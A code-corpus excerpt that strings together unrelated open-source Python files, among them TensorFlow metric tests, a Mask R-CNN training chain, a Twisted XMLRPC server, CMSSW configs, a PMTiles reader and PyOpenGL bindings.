'task_a': tf.constant([1, 0], dtype=tf.int64),
'task_b': tf.constant([1, 0], dtype=tf.int64),
},
'predictions_fn':
lambda: {
'probabilities':
tf.constant([[0.0, 1.0], [1.0, 0.0]], dtype=tf.float32),
'probabilities/task_a':
tf.constant([[0.0, 1.0], [1.0, 0.0]], dtype=tf.float32),
'probabilities/task_b':
tf.constant([[0.0, 1.0], [1.0, 0.0]], dtype=tf.float32),
},
'exception_class':
NotImplementedError,
}, {
'testcase_name':
'pr_rank3_prob_tensor',
'metric_fn_factory':
metric_fns.make_auc_pr_metric_fn,
'label_vocabulary':
None,
'labels_fn':
lambda: tf.constant([1, 0], dtype=tf.int64),
'predictions_fn':
lambda: {
'probabilities':
tf.constant([[[0.5, 0.5], [0.5, 0.5]],
[[0.5, 0.5], [0.5, 0.5]]],
dtype=tf.float32),
},
'exception_class':
ValueError,
}, {
'testcase_name':
'pr_prob_tensor_3_classes',
'metric_fn_factory':
metric_fns.make_auc_pr_metric_fn,
'label_vocabulary':
None,
'labels_fn':
lambda: tf.constant([2, 1, 0], dtype=tf.int64),
'predictions_fn':
lambda: {
'probabilities':
tf.constant([[0.0, 1.0, 0.0], [1.0, 0.0, 0.0]],
dtype=tf.float32),
},
'exception_class':
ValueError,
}, {
'testcase_name':
'roc_string_label_no_vocab',
'metric_fn_factory':
metric_fns.make_auc_roc_metric_fn,
'label_vocabulary':
None,
'labels_fn':
lambda: tf.constant(['ONE', 'ZERO'], dtype=tf.string),
'predictions_fn':
lambda: {
'probabilities':
tf.constant([[1.0, 0.0], [0.0, 1.0]], dtype=tf.float32),
},
'exception_class':
ValueError,
})
# pylint: enable=g-long-lambda
def test_auc_metric_fn_error(self, metric_fn_factory, label_vocabulary,
labels_fn, predictions_fn, exception_class):
with self.assertRaises(exception_class):
metric_fn = metric_fn_factory(label_vocabulary)
metric_fn(labels_fn(), predictions_fn())
def test_create_num_parameters_metric_fn_no_tower(self):
# Force graph mode
with tf.compat.v1.Graph().as_default():
_ = tf.compat.v1.get_variable(
name='w', shape=[10, 2], dtype=tf.float32, trainable=True)
_ = tf.compat.v1.get_variable(
name='b', shape=[2], dtype=tf.float32, trainable=True)
metric_fn = metric_fns.create_num_parameters_metric_fn(None)
metrics_dict = metric_fn(None, None)
with self.test_session() as sess:
self.assertEqual(22, sess.run(metrics_dict['num_parameters'][1]))
def test_create_num_parameters_metric_fn_with_tower(self):
# Force graph mode
with tf.compat.v1.Graph().as_default():
_ = tf.compat.v1.get_variable(
name='Phoenix/name', shape=[10, 2], dtype=tf.float32, trainable=True)
_ = tf.compat.v1.get_variable(
name='b', shape=[2], dtype=tf.float32, trainable=True)
metric_fn = metric_fns.create_num_parameters_metric_fn('name')
metrics_dict = metric_fn(None, None)
with self.test_session() as sess:
self.assertEqual(20, sess.run(metrics_dict['num_parameters'][1]))
def test_combine_metric_fns(self):
# Force graph mode
with tf.compat.v1.Graph().as_default():
def metric_fn_1(labels, predictions, weights=None):
del labels
del predictions
del weights
one = tf.constant(1, dtype=tf.int32)
return {'foo1': (one, one)}
def metric_fn_2(labels, predictions, weights=None):
del labels
del predictions
del weights
two = tf.constant(2, dtype=tf.int32)
return {'foo2': (two, two)}
metric_fn_combined = metric_fns.combine_metric_fns(
[metric_fn_1, metric_fn_2])
metrics_dict = metric_fn_combined(None, None)
with self.test_session() as sess:
self.assertEqual(1, sess.run(metrics_dict['foo1'][1]))
self.assertEqual(2, sess.run(metrics_dict['foo2'][1]))
if __name__ == '__main__':
tf.enable_v2_behavior()
tf.test.main()
|
dirscan/dirsearch/thirdparty/sqlmap/__init__.py | imfiver/Sec-Tools | 351 | 12652408 | <reponame>imfiver/Sec-Tools
from .DynamicContentParser import *
|
build/scripts/run_tool.py | HeyLey/catboost | 6,989 | 12652454 | import sys
import subprocess
import os
if __name__ == '__main__':
env = os.environ.copy()
env['ASAN_OPTIONS'] = 'detect_leaks=0'
subprocess.check_call(sys.argv[sys.argv.index('--') + 1:], env=env)
|
mask_rcnn_train_chain.py | mikito0011/Chainer_Mask_R-CNN | 153 | 12652463 | import numpy as np
import chainer
from chainer import cuda
import chainer.functions as F
from chainercv.links.model.faster_rcnn.utils.anchor_target_creator import AnchorTargetCreator
from utils.proposal_target_creator import ProposalTargetCreator
from chainer import computational_graph as c
from chainercv.links import PixelwiseSoftmaxClassifier
class MaskRCNNTrainChain(chainer.Chain):
def __init__(self, mask_rcnn, rpn_sigma=3., roi_sigma=1., gamma=1,
anchor_target_creator=AnchorTargetCreator(),
roi_size=14):
super(MaskRCNNTrainChain, self).__init__()
with self.init_scope():
self.mask_rcnn = mask_rcnn
self.rpn_sigma = rpn_sigma
self.roi_sigma = roi_sigma
self.anchor_target_creator = anchor_target_creator
self.proposal_target_creator = ProposalTargetCreator(roi_size=roi_size//2)
self.loc_normalize_mean = mask_rcnn.loc_normalize_mean
self.loc_normalize_std = mask_rcnn.loc_normalize_std
self.decayrate=0.99
self.avg_loss = None
self.gamma=gamma
def __call__(self, imgs, bboxes, labels, scale, masks, i):
if isinstance(bboxes, chainer.Variable):
bboxes = bboxes.data
if isinstance(labels, chainer.Variable):
labels = labels.data
if isinstance(scale, chainer.Variable):
scale = scale.data
if isinstance(masks, chainer.Variable):
masks = masks.data
scale = np.asscalar(cuda.to_cpu(scale))
n = bboxes.shape[0]
if n != 1:
raise ValueError('only batch size 1 is supported')
_, _, H, W = imgs.shape
img_size = (H, W)
#Extractor (VGG) : img -> features
with chainer.using_config('train', False):
features = self.mask_rcnn.extractor(imgs)
#Region Proposal Network : features -> rpn_locs, rpn_scores, rois
rpn_locs, rpn_scores, rois, roi_indices, anchor = self.mask_rcnn.rpn(
features, img_size, scale)
bbox, label, mask, rpn_score, rpn_loc, roi = \
bboxes[0], labels[0], masks[0], rpn_scores[0], rpn_locs[0], rois # batch size=1
#proposal target : roi(proposed) , bbox(GT), label(GT) -> sample_roi, gt_roi_loc, gt_roi_label
#the targets are compared with the head output.
sample_roi, gt_roi_loc, gt_roi_label, gt_roi_mask = self.proposal_target_creator(
roi, bbox, label, mask, self.loc_normalize_mean, self.loc_normalize_std)
sample_roi_index = self.xp.zeros((len(sample_roi),), dtype=np.int32)
#Head Network : features, sample_roi -> roi_cls_loc, roi_score
with chainer.using_config('train', False):
hres5 = self.mask_rcnn.head.res5head(features, sample_roi, sample_roi_index)
roi_cls_loc, roi_score = self.mask_rcnn.head.boxhead(hres5)
roi_cls_mask = self.mask_rcnn.head.maskhead(hres5)
del(hres5)
#RPN losses
gt_rpn_loc, gt_rpn_label = self.anchor_target_creator(bbox, anchor, img_size)
rpn_loc_loss = _fast_rcnn_loc_loss(rpn_loc, gt_rpn_loc, gt_rpn_label, self.rpn_sigma)
rpn_cls_loss = F.sigmoid_cross_entropy(rpn_score, gt_rpn_label)
#Head output losses
n_sample = roi_cls_loc.shape[0]
roi_cls_loc = roi_cls_loc.reshape((n_sample, -1, 4))
roi_loc = roi_cls_loc[self.xp.arange(n_sample), gt_roi_label]
roi_mask = roi_cls_mask[self.xp.arange(n_sample), gt_roi_label]
roi_loc_loss = _fast_rcnn_loc_loss(roi_loc, gt_roi_loc, gt_roi_label, self.roi_sigma)
roi_cls_loss = F.softmax_cross_entropy(roi_score, gt_roi_label)
#mask loss: average binary cross-entropy loss
mask_loss = F.sigmoid_cross_entropy(roi_mask[0:gt_roi_mask.shape[0]], gt_roi_mask)
#total loss
loss = rpn_loc_loss + rpn_cls_loss + roi_loc_loss + roi_cls_loss + self.gamma * mask_loss
#avg loss calculation
if self.avg_loss is None:
self.avg_loss = loss.data
else:
self.avg_loss = self.avg_loss * self.decayrate + loss.data*(1-self.decayrate)
chainer.reporter.report({'rpn_loc_loss':rpn_loc_loss,
'rpn_cls_loss':rpn_cls_loss,
'roi_loc_loss':roi_loc_loss,
'roi_cls_loss':roi_cls_loss,
'roi_mask_loss':self.gamma * mask_loss,
'avg_loss':self.avg_loss,
'loss':loss}, self)
return loss
def _smooth_l1_loss(x, t, in_weight, sigma):
sigma2 = sigma ** 2
diff = in_weight * (x - t)
abs_diff = F.absolute(diff)
flag = (abs_diff.data < (1. / sigma2)).astype(np.float32)
y = (flag * (sigma2 / 2.) * F.square(diff) +
(1 - flag) * (abs_diff - 0.5 / sigma2))
return F.sum(y)
def _fast_rcnn_loc_loss(pred_loc, gt_loc, gt_label, sigma):
xp = chainer.cuda.get_array_module(pred_loc)
in_weight = xp.zeros_like(gt_loc)
in_weight[gt_label > 0] = 1
loc_loss = _smooth_l1_loss(pred_loc, gt_loc, in_weight, sigma)
loc_loss /= xp.sum(gt_label >= 0)
return loc_loss
|
src/gimelstudio/core/__init__.py | Correct-Syntax/GimelStudio | 134 | 12652503 | from .datatypes import RenderImage
from .eval_info import EvalInfo
from .output_eval import OutputNodeEval
from .renderer import Renderer
from .glsl_renderer import GLSLRenderer
from .registry import RegisterNode, UnregisterNode, NODE_REGISTRY
from .project_file import ProjectFileIO
|
trigger/contrib/xmlrpc/server.py | jccardonar/trigger | 380 | 12652539 | """
Trigger Twisted XMLRPC server with an SSH manhole. Supports SSL.
This provides a daemonized Twisted reactor loop, Trigger and client
applications do not have to co-habitate. Using the XMLRPC server model, all
Trigger compatibility tasks can be executed using simple XMLRPC clients that
call the appropriate method with arguments on the local XMLRPC server instance.
New methods can be added by way of plugins.
See ``examples/xmlrpc_server`` in the Trigger source distribution for a simple
usage example.
"""
import os
import sys
import types
from trigger.contrib.commando import CommandoApplication
from trigger.utils import importlib
from twisted.internet import defer
from twisted.python import log
from twisted.web import xmlrpc, server
# Enable Deferred debuging if ``DEBUG`` is set.
if os.getenv('DEBUG'):
defer.setDebugging(True)
class TriggerXMLRPCServer(xmlrpc.XMLRPC):
"""
Twisted XMLRPC server front-end for Commando
"""
def __init__(self, *args, **kwargs):
xmlrpc.XMLRPC.__init__(self, *args, **kwargs)
self.allowNone = True
self.useDateTime = True
self._handlers = []
self._procedure_map = {}
self.addHandlers(self._handlers)
def lookupProcedure(self, procedurePath):
"""
Lookup a method dynamically.
1. First, see if it's provided by a sub-handler.
2. Or try a self-defined method (prefixed with `xmlrpc_`)
3. Lastly, try dynamically mapped methods.
4. Or fail loudly.
"""
log.msg("LOOKING UP:", procedurePath)
if procedurePath.find(self.separator) != -1:
prefix, procedurePath = procedurePath.split(self.separator, 1)
handler = self.getSubHandler(prefix)
if handler is None:
raise xmlrpc.NoSuchFunction(self.NOT_FOUND,
"no such subHandler %s" % prefix)
return handler.lookupProcedure(procedurePath)
# Try self-defined methods first...
f = getattr(self, "xmlrpc_%s" % procedurePath, None)
# Try mapped methods second...
if f is None:
f = self._procedure_map.get(procedurePath, None)
if not f:
raise xmlrpc.NoSuchFunction(self.NOT_FOUND,
"procedure %s not found" % procedurePath)
elif not callable(f):
raise xmlrpc.NoSuchFunction(self.NOT_FOUND,
"procedure %s not callable" % procedurePath)
else:
return f
def addHandlers(self, handlers):
"""Add multiple handlers"""
for handler in handlers:
self.addHandler(handler)
def addHandler(self, handler):
"""
Add a handler and bind it to an XMLRPC procedure.
Handler must a be a function or an instance of an object with handler
methods.
"""
# Register it
log.msg("Adding handler: %s" % handler)
self._handlers.append(handler)
# If it's a function, bind it as its own internal name.
if type(handler) in (types.BuiltinFunctionType, types.FunctionType):
name = handler.__name__
if name.startswith('xmlrpc_'):
name = name[7:] # If it starts w/ 'xmlrpc_', slice it out!
log.msg("Mapping function %s..." % name)
self._procedure_map[name] = handler
return None
# Otherwise, walk the methods on any class objects and bind them by
# their attribute name.
for method in dir(handler):
if not method.startswith('_'):
log.msg("Mapping method %s..." % method)
self._procedure_map[method] = getattr(handler, method)
def listProcedures(self):
"""Return a list of the registered procedures"""
return self._procedure_map.keys()
def xmlrpc_add_handler(self, mod_name, task_name, force=False):
"""
Add a handler object from a remote call.
"""
module = None
if mod_name in sys.modules:
# Check if module is already loaded
if force:
log.msg("Forcing reload of handler: %r" % task_name)
# Allow user to force reload of module
module = reload(sys.modules[mod_name])
else:
# If not forcing reload, don't bother with the rest
log.msg("%r already loaded" % mod_name)
return None
else:
log.msg("Trying to add handler: %r" % task_name)
try:
module = importlib.import_module(mod_name, __name__)
except NameError as msg:
log.msg('NameError: %s' % msg)
except:
pass
if not module:
log.msg(" Unable to load module: %s" % mod_name)
return None
else:
handler = getattr(module, 'xmlrpc_' + task_name)
# XMLRPC methods will not accept kwargs. Instead, we pass 2 position
# args: args and kwargs, to a shell method (dummy) that will explode
# them when sending to the user defined method (handler).
def dummy(self, args, kwargs):
return handler(*args, **kwargs)
# TODO (jathan): Make this work!!
# This just simply does not work. I am not sure why, but it results in a
# "<Fault 8001: 'procedure config_device not found'>" error!
# # Bind the dummy shell method to TriggerXMLRPCServer. The function's
# # name will be used to map it to the "dummy" handler object.
# dummy.__name__ = task_name
# self.addHandler(dummy)
# This does work.
# Bind the dummy shell method to TriggerXMLRPCServer as 'xmlrpc_' + task_name
setattr(TriggerXMLRPCServer, 'xmlrpc_' + task_name, dummy)
def xmlrpc_list_subhandlers(self):
return list(self.subHandlers)
def xmlrpc_execute_commands(self, args, kwargs):
"""Execute ``commands`` on ``devices``"""
c = CommandoApplication(*args, **kwargs)
d = c.run()
return d
def xmlrpc_add(self, x, y):
"""Adds x and y"""
return x + y
def xmlrpc_fault(self):
"""
Raise a Fault indicating that the procedure should not be used.
"""
raise xmlrpc.Fault(123, "The fault procedure is faulty.")
def _ebRender(self, failure):
"""
Custom exception rendering.
Ref: https://netzguerilla.net/iro/dev/_modules/iro/view/xmlrpc.html
"""
if isinstance(failure.value, Exception):
msg = """%s: %s""" % (failure.type.__name__, failure.value.args[0])
return xmlrpc.Fault(400, msg)
return super(TriggerXMLRPCServer, self)._ebRender(self, failure)
# XXX (jathan): Note that this is out-of-sync w/ the twistd plugin and is
# probably broken.
def main():
"""To daemonize as a twistd plugin! Except this doesn't work and these"""
from twisted.application.internet import TCPServer, SSLServer
from twisted.application.service import Application
from twisted.internet import ssl
rpc = TriggerXMLRPCServer()
xmlrpc.addIntrospection(rpc)
server_factory = server.Site(rpc)
application = Application('trigger_xmlrpc')
#xmlrpc_service = TCPServer(8000, server_factory)
ctx = ssl.DefaultOpenSSLContextFactory('server.key', 'cacert.pem')
xmlrpc_service = SSLServer(8000, server_factory, ctx)
xmlrpc_service.setServiceParent(application)
return application
if __name__ == '__main__':
# To run me as a daemon:
# twistd -l server.log --pidfile server.pid -y server.py
application = main()
|
SimG4Core/PrintGeomInfo/python/testTotemGeometryXML_cfi.py | ckamtsikis/cmssw | 852 | 12652542 | <gh_stars>100-1000
import FWCore.ParameterSet.Config as cms
XMLIdealGeometryESSource = cms.ESSource("XMLIdealGeometryESSource",
geomXMLFiles = cms.vstring('Geometry/CMSCommonData/data/materials.xml',
'Geometry/CMSCommonData/data/rotations.xml',
'Geometry/CMSCommonData/data/extend/cmsextent.xml',
'Geometry/CMSCommonData/data/cms.xml',
'Geometry/CMSCommonData/data/cmsMother.xml',
'Geometry/ForwardCommonData/data/forward.xml',
'Geometry/ForwardCommonData/data/totemMaterials.xml',
'Geometry/ForwardCommonData/data/totemRotations.xml',
'Geometry/ForwardCommonData/data/totemt1.xml',
'Geometry/ForwardCommonData/data/totemt2.xml',
'Geometry/ForwardCommonData/data/ionpump.xml',
'Geometry/ForwardSimData/data/totemsensT1.xml',
'Geometry/ForwardSimData/data/totemsensT2.xml',
'Geometry/CMSCommonData/data/FieldParameters.xml'),
rootNodeName = cms.string('cms:OCMS')
)
|
RST/ODSAextensions/odsa/chapnum/chapnum.py | dwgillies/OpenDSA | 200 | 12652563 | <filename>RST/ODSAextensions/odsa/chapnum/chapnum.py
# Copyright (C) 2012 <NAME>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the MIT License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
#
__author__ = 'efouh'
__docformat__ = 'reStructuredText'
import re
import sys
from docutils import nodes, utils
from docutils.transforms import TransformError, Transform
from docutils.parsers.rst import directives
from docutils.parsers.rst import Directive
from docutils import nodes, languages
from docutils.transforms import parts
def setup(app):
app.add_directive('chapnum',chapnum)
class chapnum(Directive):
"""Automatic section numbering. with space at the end"""
option_spec = {'depth': int,
'start': int,
'prefix': directives.unchanged_required,
'suffix': directives.unchanged_required}
def run(self):
tmp = self.options['prefix']
tmp += ' '
self.options['prefix'] = tmp
pending = nodes.pending(parts.SectNum)
pending.details.update(self.options)
self.state_machine.document.note_pending(pending)
return [pending]
if __name__ == '__main__':
directives.register_directive('chapnum',chapnum)
|
python/pmtiles/reader.py | eddy-geek/PMTiles | 133 | 12652568 | import json
import mmap
from contextlib import contextmanager
@contextmanager
def read(fname):
r = Reader(fname)
try:
yield r
finally:
r.close()
class Reader:
def __init__(self,fname):
self.f = open(fname, "r+b")
self.mmap = mmap.mmap(self.f.fileno(), 0)
assert int.from_bytes(self.mmap[0:2],byteorder='little') == 0x4D50
first_entry_idx = 10+self.metadata_len
self.root_dir, self.leaves = self.load_directory(first_entry_idx,self.root_entries)
def load_directory(self,offset,num_entries):
directory = {}
leaves = {}
for i in range(offset,offset+num_entries*17,17):
z = int.from_bytes(self.mmap[i:i+1],byteorder='little')
x = int.from_bytes(self.mmap[i+1:i+4],byteorder='little')
y = int.from_bytes(self.mmap[i+4:i+7],byteorder='little')
tile_off = int.from_bytes(self.mmap[i+7:i+13],byteorder='little')
tile_len = int.from_bytes(self.mmap[i+13:i+17],byteorder='little')
if (z & 0b10000000):
leaves[(z & 0b01111111,x,y)] = (tile_off,tile_len)
else:
directory[(z,x,y)] = (tile_off,tile_len)
return (directory,leaves)
def close(self):
self.f.close()
@property
def metadata_len(self):
return int.from_bytes(self.mmap[4:8],byteorder='little')
@property
def metadata(self):
s = self.mmap[10:10+self.metadata_len]
return json.loads(s)
@property
def version(self):
return int.from_bytes(self.mmap[2:4],byteorder='little')
@property
def root_entries(self):
return int.from_bytes(self.mmap[8:10],byteorder='little')
def get(self,z,x,y):
val = self.root_dir.get((z,x,y))
if val:
return self.mmap[val[0]:val[0]+val[1]]
else:
z7_tile_diff = z - 7
z7_tile = (7,x // (1 << z7_tile_diff),y // (1 << z7_tile_diff))
val = self.leaves.get(z7_tile)
if val:
directory, _ = self.load_directory(val[0],val[1]//17)
val = directory.get((z,x,y))
if val:
return self.mmap[val[0]:val[0]+val[1]]
def tiles(self):
for k,v in self.root_dir.items():
yield (k,self.mmap[v[0]:v[0]+v[1]])
for val in self.leaves.values():
leaf_dir, _ = self.load_directory(val[0],val[1]//17)
for k,v in leaf_dir.items():
yield (k,self.mmap[v[0]:v[0]+v[1]])
|
pipenv/vendor/passa/internals/traces.py | jrottenberg/pipenv | 6,263 | 12652581 | <reponame>jrottenberg/pipenv
# -*- coding=utf-8 -*-
from __future__ import absolute_import, unicode_literals
def _trace_visit_vertex(graph, current, target, visited, path, paths):
if current == target:
paths.append(path)
return
for v in graph.iter_children(current):
if v == current or v in visited:
continue
next_path = path + [current]
next_visited = visited | {current}
_trace_visit_vertex(graph, v, target, next_visited, next_path, paths)
def trace_graph(graph):
"""Build a collection of "traces" for each package.
A trace is a list of names that eventually leads to the package. For
example, if A and B are root dependencies, A depends on C and D, B
depends on C, and C depends on D, the return value would be like::
{
None: [],
"A": [None],
"B": [None],
"C": [[None, "A"], [None, "B"]],
"D": [[None, "B", "C"], [None, "A"]],
}
"""
result = {None: []}
for vertex in graph:
result[vertex] = []
for root in graph.iter_children(None):
paths = []
_trace_visit_vertex(graph, root, vertex, {None}, [None], paths)
result[vertex].extend(paths)
return result
|
alipay/aop/api/domain/OrderStatusData.py | antopen/alipay-sdk-python-all | 213 | 12652592 | <reponame>antopen/alipay-sdk-python-all
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.constant.ParamConstants import *
class OrderStatusData(object):
def __init__(self):
self._order_id = None
self._reject_reason = None
self._status = None
@property
def order_id(self):
return self._order_id
@order_id.setter
def order_id(self, value):
self._order_id = value
@property
def reject_reason(self):
return self._reject_reason
@reject_reason.setter
def reject_reason(self, value):
self._reject_reason = value
@property
def status(self):
return self._status
@status.setter
def status(self, value):
self._status = value
def to_alipay_dict(self):
params = dict()
if self.order_id:
if hasattr(self.order_id, 'to_alipay_dict'):
params['order_id'] = self.order_id.to_alipay_dict()
else:
params['order_id'] = self.order_id
if self.reject_reason:
if hasattr(self.reject_reason, 'to_alipay_dict'):
params['reject_reason'] = self.reject_reason.to_alipay_dict()
else:
params['reject_reason'] = self.reject_reason
if self.status:
if hasattr(self.status, 'to_alipay_dict'):
params['status'] = self.status.to_alipay_dict()
else:
params['status'] = self.status
return params
@staticmethod
def from_alipay_dict(d):
if not d:
return None
o = OrderStatusData()
if 'order_id' in d:
o.order_id = d['order_id']
if 'reject_reason' in d:
o.reject_reason = d['reject_reason']
if 'status' in d:
o.status = d['status']
return o
|
atest/logcheck.py | icankeep/jupyterlab-lsp | 1,117 | 12652689 | <filename>atest/logcheck.py<gh_stars>1000+
from bs4 import UnicodeDammit
def file_should_not_contain_phrases(filename, offset=0, *phrases):
"""don't fail _too_ hard if the file can't be read for some reason"""
with open(filename, "rb") as fp:
raw = fp.read()[offset:]
text = None
try:
text = raw.decode("utf-8")
except Exception as err:
print("Failed to read", filename, "forcing unicode...\n", err)
try:
text = UnicodeDammit.detwingle(raw).decode("utf-8")
except Exception as err:
print("Failed to read", filename, "giving up...\n", err)
text = None
matches = {}
if text is not None:
for phrase in phrases:
if phrase in text:
matches[phrase] = True
assert not matches, "Phrases found in {}: {}".format(filename, matches)
|
app/demo/periods/__init__.py | sesostris/django-material-admin | 270 | 12652690 | default_app_config = 'demo.periods.apps.PeriodsConfig'
|
symmetric_tree/solution.py | mahimadubey/leetcode-python | 528 | 12652695 | <filename>symmetric_tree/solution.py
"""
Given a binary tree, check whether it is a mirror of itself (ie, symmetric
around its center).
For example, this binary tree is symmetric:
1
/ \
2 2
/ \ / \
3 4 4 3
But the following is not:
1
/ \
2 2
\ \
3 3
"""
# Definition for a binary tree node.
# class TreeNode(object):
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Solution(object):
def isSymmetric(self, root):
"""
:type root: TreeNode
:rtype: bool
"""
if root is None:
return True
if root.left is None and root.right is None:
return True
if root.left is not None and root.right is not None:
return self._isSymmetric(root.left, root.right)
return False
def _isSymmetric(self, left, right):
if left is None and right is None:
return True
if left is not None and right is not None:
return (left.val == right.val and
self._isSymmetric(left.left, right.right) and
self._isSymmetric(left.right, right.left))
return False
|
tests/test_client/auth_backends.py | jpmallarino/django | 61,676 | 12652704 | from django.contrib.auth.backends import ModelBackend
class TestClientBackend(ModelBackend):
pass
class BackendWithoutGetUserMethod:
pass
|
HLTriggerOffline/SUSYBSM/test/SUSYBSM_triggerValidation.py | ckamtsikis/cmssw | 852 | 12652707 | import FWCore.ParameterSet.Config as cms
process = cms.Process("DQM")
#
# DQM SERVICES
#
process.load("DQMServices.Core.DQM_cfg")
process.load("FWCore.MessageService.MessageLogger_cfi")
#
# DQM SOURCES
#
process.load("CondCore.DBCommon.CondDBSetup_cfi")
#process.load("Configuration.GlobalRuns.ForceZeroTeslaField_cff")
#process.load("Configuration.GlobalRuns.ReconstructionGR_cff")
process.load("Configuration.StandardSequences.GeometryRecoDB_cff")
#process.load("L1Trigger.Configuration.L1Config_cff")
process.load("L1TriggerConfig.L1ScalesProducers.L1MuTriggerScalesConfig_cff")
process.load("L1TriggerConfig.L1ScalesProducers.L1MuTriggerPtScaleConfig_cff")
process.load("L1TriggerConfig.L1GtConfigProducers.L1GtBoardMapsConfig_cff")
process.load("L1TriggerConfig.L1GtConfigProducers.L1GtConfig_cff")
process.load("L1TriggerConfig.L1GtConfigProducers.Luminosity.lumi1030.L1Menu2008_2E30_Unprescaled_cff")
#process.load("L1Trigger.HardwareValidation.L1HardwareValidation_cff")
process.load("DQMServices.Components.DQMEnvironment_cfi")
# The GenMET is not in the edm root files. You have to produce it by yourself
process.load("RecoMET.Configuration.GenMETParticles_cff")
process.load("RecoMET.METProducers.genMetTrue_cfi")
process.load("HLTriggerOffline.SUSYBSM.SUSYBSM_triggerValidation_cff")
process.load("Geometry.CaloEventSetup.CaloTopology_cfi")
process.maxEvents = cms.untracked.PSet(
input = cms.untracked.int32(10)
)
process.source = cms.Source("PoolSource",
fileNames = cms.untracked.vstring(
#"file:/build/nuno/test31/CMSSW_3_1_0_pre5/src/TTbar_Tauola_cfi_py_GEN_FASTSIM_VALIDATION.root"
'/store/relval/CMSSW_3_1_0_pre5/RelValQCD_Pt_80_120/GEN-SIM-RECO/IDEAL_31X_v1/0000/E63C1A00-0C2C-DE11-BFC1-000423D98800.root'
)
)
process.MessageLogger = cms.Service("MessageLogger",
detailedInfo = cms.untracked.PSet(
threshold = cms.untracked.string('INFO')
),
critical = cms.untracked.PSet(
threshold = cms.untracked.string('ERROR')
),
debugModules = cms.untracked.vstring('*'),
cout = cms.untracked.PSet(
threshold = cms.untracked.string('WARNING'),
WARNING = cms.untracked.PSet(
limit = cms.untracked.int32(0)
),
noLineBreaks = cms.untracked.bool(True)
),
destinations = cms.untracked.vstring('detailedInfo',
'critical',
'cout')
)
process.p = cms.Path(process.genCandidatesForMET*process.genParticlesForMETAllVisible*process.genMetTrue*process.HLTSusyExoVal)
process.pEnd = cms.Path(process.dqmSaver)
process.DQMStore.verbose = 0
process.DQM.collectorHost = ''
process.dqmSaver.convention = 'Online'
process.dqmSaver.saveByRun = 1
process.dqmSaver.saveAtJobEnd = True
|
deep-rl/lib/python2.7/site-packages/OpenGL/raw/GL/SUN/vertex.py | ShujaKhalid/deep-rl | 210 | 12652727 | <filename>deep-rl/lib/python2.7/site-packages/OpenGL/raw/GL/SUN/vertex.py
'''Autogenerated by xml_generate script, do not edit!'''
from OpenGL import platform as _p, arrays
# Code generation uses this
from OpenGL.raw.GL import _types as _cs
# End users want this...
from OpenGL.raw.GL._types import *
from OpenGL.raw.GL import _errors
from OpenGL.constant import Constant as _C
import ctypes
_EXTENSION_NAME = 'GL_SUN_vertex'
def _f( function ):
return _p.createFunction( function,_p.PLATFORM.GL,'GL_SUN_vertex',error_checker=_errors._error_checker)
@_f
@_p.types(None,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat)
def glColor3fVertex3fSUN(r,g,b,x,y,z):pass
@_f
@_p.types(None,arrays.GLfloatArray,arrays.GLfloatArray)
def glColor3fVertex3fvSUN(c,v):pass
@_f
@_p.types(None,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat)
def glColor4fNormal3fVertex3fSUN(r,g,b,a,nx,ny,nz,x,y,z):pass
@_f
@_p.types(None,arrays.GLfloatArray,arrays.GLfloatArray,arrays.GLfloatArray)
def glColor4fNormal3fVertex3fvSUN(c,n,v):pass
@_f
@_p.types(None,_cs.GLubyte,_cs.GLubyte,_cs.GLubyte,_cs.GLubyte,_cs.GLfloat,_cs.GLfloat)
def glColor4ubVertex2fSUN(r,g,b,a,x,y):pass
@_f
@_p.types(None,arrays.GLubyteArray,arrays.GLfloatArray)
def glColor4ubVertex2fvSUN(c,v):pass
@_f
@_p.types(None,_cs.GLubyte,_cs.GLubyte,_cs.GLubyte,_cs.GLubyte,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat)
def glColor4ubVertex3fSUN(r,g,b,a,x,y,z):pass
@_f
@_p.types(None,arrays.GLubyteArray,arrays.GLfloatArray)
def glColor4ubVertex3fvSUN(c,v):pass
@_f
@_p.types(None,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat)
def glNormal3fVertex3fSUN(nx,ny,nz,x,y,z):pass
@_f
@_p.types(None,arrays.GLfloatArray,arrays.GLfloatArray)
def glNormal3fVertex3fvSUN(n,v):pass
@_f
@_p.types(None,_cs.GLuint,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat)
def glReplacementCodeuiColor3fVertex3fSUN(rc,r,g,b,x,y,z):pass
@_f
@_p.types(None,arrays.GLuintArray,arrays.GLfloatArray,arrays.GLfloatArray)
def glReplacementCodeuiColor3fVertex3fvSUN(rc,c,v):pass
@_f
@_p.types(None,_cs.GLuint,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat)
def glReplacementCodeuiColor4fNormal3fVertex3fSUN(rc,r,g,b,a,nx,ny,nz,x,y,z):pass
@_f
@_p.types(None,arrays.GLuintArray,arrays.GLfloatArray,arrays.GLfloatArray,arrays.GLfloatArray)
def glReplacementCodeuiColor4fNormal3fVertex3fvSUN(rc,c,n,v):pass
@_f
@_p.types(None,_cs.GLuint,_cs.GLubyte,_cs.GLubyte,_cs.GLubyte,_cs.GLubyte,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat)
def glReplacementCodeuiColor4ubVertex3fSUN(rc,r,g,b,a,x,y,z):pass
@_f
@_p.types(None,arrays.GLuintArray,arrays.GLubyteArray,arrays.GLfloatArray)
def glReplacementCodeuiColor4ubVertex3fvSUN(rc,c,v):pass
@_f
@_p.types(None,_cs.GLuint,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat)
